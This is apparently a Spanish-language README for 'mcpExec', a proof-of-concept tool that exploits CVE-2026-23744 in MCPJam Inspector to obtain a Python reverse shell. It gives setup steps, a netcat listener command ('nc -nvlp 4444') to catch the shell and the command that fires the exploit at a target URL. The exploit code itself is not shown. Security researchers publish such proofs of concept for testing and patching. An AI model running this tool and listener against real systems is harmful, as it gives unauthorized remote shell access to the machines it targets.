
POC para CVE-2026-23744 para un revshell de python
mcpExec es una herramienta que aprovecha el CVE-2026-23744 para obtener una reverse shell usando la URL de la instalación vulnerable de MCPJam Inspector.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
Para salir del entorno virtual:
deactivate
Abre un listener para que el exploit funcione:
nc -nvlp 4444
Este comando te proporcionará la reverse shell (si el sistema afectado tiene Python3 instalado).
./mcpExec.py http://localhost:6274